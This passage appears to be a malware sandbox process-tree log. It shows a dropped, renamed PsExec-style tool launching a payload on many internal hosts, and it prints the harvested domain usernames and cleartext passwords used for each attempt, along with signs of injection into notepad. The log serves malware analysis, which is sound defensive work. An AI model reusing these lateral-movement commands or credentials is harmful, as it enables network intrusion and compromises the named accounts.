- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4760
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4636
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4856
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4820
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4996
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:5052
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:1196
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:5104
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:3796
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4320
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4160
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4200
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4260
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:1736
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4268
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4164
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4400
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4688
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4532
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4488
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4736
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4812
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:3216
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4872
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4964
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4836
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:5040
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4264
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:5108
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:2620
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:1044
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4220
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4544
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4116
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4592
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1388
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4288
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4580
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:1168
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:3408
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4708
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4720
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4748
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:200
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4744
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4984
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4824
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4808
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:5084
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4900
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:1464
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4108
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4172
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:2704
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:5112
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:3996
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4664
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4216
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4692
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4780
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4588
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4452
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4648
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4852
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:212
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:1376
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Drops file in Windows directory
    PID:5012
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Drops file in Windows directory
    PID:2676
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:3672
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4224
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:2164
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4276
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4296
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4116
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4608
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4628
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4796
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4432
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4672
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4940
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:1796
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4696
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4732
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4148
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4960
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:2316
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:5088
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1580
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4228
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4600
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4156
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4668
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4516
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4348
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:3932
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4444
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1192
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4876
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4992
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    PID:4860
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:904
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4016
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Modifies data under HKEY_USERS
    PID:5100

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:612

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Windows\_ple.exe
  "_ple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    - Drops file in Windows directory
    PID:2872
- C:\Windows\_ple.exe
  "_ple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:188
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    - Drops file in Windows directory
    PID:2080
- C:\Windows\_ple.exe
  "_ple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    - Drops file in Windows directory
    PID:4364
- C:\Windows\_ple.exe
  "_ple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    - Drops file in Windows directory
    PID:4864
- C:\Windows\_ple.exe
  "_ple.exe"
  2⤵
  - Executes dropped EXE
  PID:5116
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    - Drops file in Windows directory
